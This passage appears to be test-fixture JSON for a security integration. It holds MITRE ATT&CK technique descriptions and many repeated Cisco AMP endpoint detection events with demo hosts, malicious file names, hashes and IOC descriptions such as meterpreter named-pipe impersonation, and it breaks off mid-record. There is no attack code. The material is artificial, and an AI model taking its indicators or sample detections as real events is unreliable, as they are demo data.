permissions/privileges).</p>\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"<p><strong>This technique has been deprecated. Please use <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a> where appropriate.</strong></p>\n\n<p>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and <a href=\"https://attack.mitre.org/techniques/T1086\">PowerShell</a> but could also be in the form of command-line batch scripts.</p>\n\n<p>Scripts can be embedded inside Office documents as macros that can be set to execute when files used in <a href=\"https://attack.mitre.org/techniques/T1193\">Spearphishing Attachment</a> and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through <a href=\"https://attack.mitre.org/techniques/T1203\">Exploitation for Client Execution</a>, where adversaries will rely on macros being allowed or that the user will accept to activate them.</p>\n\n<p>Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</p>\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}]}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180352115244794000,"timestamp":1610709638,"timestamp_nanoseconds":279000000,"date":"2021-01-15T11:20:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180352115244793858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180351977805840000,"timestamp":1610709606,"timestamp_nanoseconds":548000000,"date":"2021-01-15T11:20:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180351977805840385","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159258594551267000,"timestamp":1610707507,"timestamp_nanoseconds":525000000,"date":"2021-01-15T10:45:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159258594551267599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iodnxvg.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\iodnxvg.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55810,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55805,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55809,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":931000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55808,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":900000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55807,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":869000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55806,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1476910664322001000,"timestamp":1610706778,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:32:58+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706778,"start_date":"2021-01-15T10:32:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Meterpreter","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"27:85:29:21:67:49"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.","short_description":"W32.PossibleNamedPipeImpersonation.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/WINDOWS/system32/cmd.exe","identity":{"sha256":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"},"parent":{"disposition":"Clean","identity":{"sha256":"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":25000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671385032556606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900329000200,"timestamp":1610706298,"timestamp_nanoseconds":329000000,"date":"2021-01-15T10:24:58+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706298,"start_date":"2021-01-15T10:24:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":926000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":533000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15212386047828,"timestamp":1610706149,"timestamp_nanoseconds":0,"date":"2021-01-15T10:22:29+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.B1380FD95B-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706149,"start_date":"2021-01-15T10:22:29+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"file:///C%3A/ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967"},"parent":{"disposition":"Clean","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":973000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":951000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":576000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":333000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat 